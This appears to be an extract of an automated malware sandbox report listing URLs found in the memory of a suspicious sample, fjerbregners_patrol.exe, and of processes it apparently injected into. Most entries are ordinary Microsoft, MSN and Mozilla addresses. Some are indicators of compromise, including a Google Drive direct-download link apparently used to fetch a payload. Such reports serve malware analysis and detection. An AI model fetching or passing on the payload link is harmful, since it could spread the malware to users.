        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JgArPAA=/Teaser/tempdrop1.svg
        Source: msdt.exe, 00000004.00000003.4467172915.0000000007BFE000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000004.00000003.4519463189.00000000082C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
        Source: explorer.exe, 00000005.00000003.4933742015.000000000FEE7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4282255001.000000000FEA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5595640936.000000000FEEC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://canary.sdx.microsoftcom/a
        Source: msdt.exe, 00000004.00000002.5572719203.0000000007B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeS
        Source: explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeS-dark
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyac
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyac-dark
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.000000000429A000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.00000000059AA000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.00000000136BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/1.20.2/TweenMax.min.js
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.000000000429A000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.00000000059AA000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.00000000136BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css
        Source: msdt.exe, 00000004.00000003.4467172915.0000000007BFE000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000004.00000003.4519463189.00000000082C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
        Source: explorer.exe, 00000005.00000003.4946620557.000000000CECF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://deff.nelr
        Source: fjerbregners_patrol.exe, 00000002.00000003.3654456834.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000002.3781463520.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000002.3780885221.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000002.3780885221.0000000003B48000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3640739946.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3641388802.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3653833929.0000000003B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0g-2c-docs.googleusercontent.com/
        Source: fjerbregners_patrol.exe, 00000002.00000003.3641388802.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3653833929.0000000003B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0g-2c-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8tk9bkcj
        Source: fjerbregners_patrol.exe, 00000002.00000002.3780885221.0000000003B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/d
        Source: fjerbregners_patrol.exe, 00000002.00000002.3780885221.0000000003B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/l
        Source: fjerbregners_patrol.exe, 00000002.00000002.3780885221.0000000003B48000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000002.3780885221.0000000003B08000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000002.3793826201.0000000033110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ac1-oEkoP2YeI5Q4arlxAmDDETDNVAGt
        Source: fjerbregners_patrol.exe, 00000002.00000002.3780885221.0000000003B48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ac1-oEkoP2YeI5Q4arlxAmDDETDNVAGtH
        Source: msdt.exe, 00000004.00000002.5574554854.00000000080DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: msdt.exe, 00000004.00000002.5572719203.0000000007B71000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.5574554854.00000000080DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: msdt.exe, 00000004.00000002.5574554854.00000000080DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: explorer.exe, 00000005.00000003.4933742015.000000000FEE7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4282255001.000000000FEA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5595640936.000000000FEEC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.00000000048E2000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000005FF2000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Noto
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.000000000429A000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.00000000059AA000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.00000000136BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto
        Source: msdt.exe, 00000004.00000003.4467172915.0000000007BFE000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000004.00000003.4519463189.00000000082C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/7dafd5f51c0afd1ae627bb4762ac0c140a6cd5f5
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA10Ozqi.img
        Source: explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA125lCw.img
        Source: explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA13ujqB.img
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA14H4ei.img
        Source: explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA14KvoM.img
        Source: explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15lYnF.img
        Source: explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1cug2r.img
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1eKcOs.img
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKp8YX.img
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AALo3og.img
        Source: explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAPwrS4.img
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AATQvrt.img
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1g3BNv.img
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBJrII1.img
        Source: explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj.img
        Source: msdt.exe, 00000004.00000003.4467172915.0000000007BFE000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000004.00000003.4519463189.00000000082C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
        Source: fjerbregners_patrol.exe, 00000002.00000001.3579838555.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.0000000003F76000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000005686000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013396000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.4570818211.00000000167E6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://js.users.51.la/21279699.js
        Source: msdt.exe, 00000004.00000002.5560664301.00000000030A4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.4933742015.000000000FEE7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4282255001.000000000FEA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5595640936.000000000FEEC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
        Source: msdt.exe, 00000004.00000002.5560664301.00000000030A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
        Source: msdt.exe, 00000004.00000002.5560664301.00000000030A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
        Source: msdt.exe, 00000004.00000003.4467172915.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org0
        Source: fjerbregners_patrol.exe, 00000002.00000003.3654456834.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3635785423.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000002.3781463520.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3640739946.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3641388802.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3653833929.0000000003B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: msdt.exe, 00000004.00000002.5560664301.000000000308C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
        Source: msdt.exe, 00000004.00000002.5560664301.000000000306E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
        Source: msdt.exe, 00000004.00000003.4457977381.0000000007AE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdms-gamingoverlay://kglcheck/res://C:
        Source: explorer.exe, 00000005.00000003.4933742015.000000000FEE7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4282255001.000000000FEA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5595640936.000000000FEEC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://oloobe.officeapps.live.com/
        Source: explorer.exe, 00000005.00000003.4933742015.000000000FEE7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4282255001.000000000FEA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5595640936.000000000FEEC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://oloobe.officepps.liv
        Source: explorer.exe, 00000005.00000003.4933742015.000000000FEE7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4282255001.000000000FEA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5595640936.000000000FEEC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
        Source: explorer.exe, 00000005.00000003.4943679913.000000000CF56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5590270246.000000000CECF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4273113348.000000000CF56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.000000000429A000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.00000000059AA000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.00000000136BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/MorphSVGPlugin.min.js
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.000000000429A000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.00000000059AA000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.00000000136BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/SplitText.min.js
        Source: explorer.exe, 00000005.00000003.4933742015.000000000FEE7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4282255001.000000000FEA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5595640936.000000000FEEC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://sdx.microsoft-int.com/
        Source: explorer.exe, 00000005.00000003.4933742015.000000000FEE7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4282255001.000000000FEA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5595640936.000000000FEEC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://sdx.microsoft-ppe.com/
        Source: fjerbregners_patrol.exe, 00000002.00000003.3635785423.0000000003B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: msdt.exe, 00000004.00000002.5572719203.0000000007B71000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.5574554854.00000000080DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
        Source: msdt.exe, 00000004.00000002.5572719203.0000000007B71000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.5574554854.00000000080DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wamiz.de/neuigkeiten/37247/frauen-auto-kamera-aussetzen
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-US&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-US&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 00000005.00000000.4273113348.000000000CECF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.4938853327.000000000CECF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5590270246.000000000CECF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.4946620557.000000000CECF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/
        Source: explorer.exe, 00000005.00000003.4933742015.000000000FEE7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4282255001.000000000FEA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5595640936.000000000FEEC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
        Source: explorer.exe, 00000005.00000002.5600769418.0000000013D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://wstatic.hosting.nic.ru/logo.svg
        Source: msdt.exe, 00000004.00000003.4467172915.0000000007BFE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4273113348.000000000CECF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.4938853327.000000000CECF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5590270246.000000000CECF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.4946620557.000000000CECF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
        Source: fjerbregners_patrol.exe, 00000002.00000003.3635785423.0000000003B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: fjerbregners_patrol.exe, 00000002.00000003.3635785423.0000000003B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: msdt.exe, 00000004.00000002.5572719203.0000000007B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
        Source: msdt.exe, 00000004.00000002.5574554854.00000000080DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: fjerbregners_patrol.exe, 00000002.00000003.3635785423.0000000003B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: fjerbregners_patrol.exe, 00000002.00000003.3635785423.0000000003B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/auto/nachrichten/das-haben-sie-noch-nie-gesehen-roboter-jagt-falschparker/
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/finanzen/top-stories/nach-
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/finanzen/top-stories/wasserkraftwerk-selbst-gebaut-vietnamese-zeigt-in-14-
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/finanzen/top-stories/zahlreiche-deutsche-autos-auf-havarierter-fremantle-h
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/lifestyle/leben/keine-guten-ausssichen-4-sternzeichen-erwartet-ein-schwere
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/lifestyle/leben/mutter-l
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/lifestyle/liebe-beziehung/frauen-steigen-aus-dem-auto-was-sie-tun-ist-uner
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/lifestyle/lifestylegeneral/make-up-auf-dem-wacken-keiner-schert-sich-einen
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/nachrichten/bildergalerien/photo-of-the-day/ss-AA1ePdb4
        Source: explorer.exe, 00000005.00000000.4262862311.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5570670853.0000000004E18000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/nachrichten/other/donald-trumps-ex-berater-john
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/nachrichten/other/donald-trumps-ex-berater-john-bolton-usa-werden-die-nato
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/nachrichten/panorama/kaufland-partnersuche-sorgt-f
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/nachrichten/panorama/neonazis-wollten-badeg
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/nachrichten/panorama/rettungshubschrauber-kollidiert-mit-baum-in-dresden/a
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/nachrichten/politik/general-a-d-ben-hodges-warum-gebt-ihr-nicht-einfach-ni
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/nachrichten/politik/stimmung-auf-dem-tiefpunkt-in-einem-600-seelen-dorf-en
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/nachrichten/politik/ukraine-krieg-milit
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/nachrichten/politik/wagner-bluff-lukaschenkos-experte-hat-prigoschin-these
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/nachrichten/politik/zeitung-titelt-zerbrechende-freundschaft-jetzt-entzwei
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/nachrichten/welt/angriff-auf-russischen-tanker-sig-soll-treibstoff-f
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/nachrichten/welt/ecowas-plant-milit
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/reisen/nachrichten/passagier-hatte-vibration-bemerkt-lufthansa-flug-nach-m
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4262862311.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5570670853.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-de/sport/fussball/coppa-italia
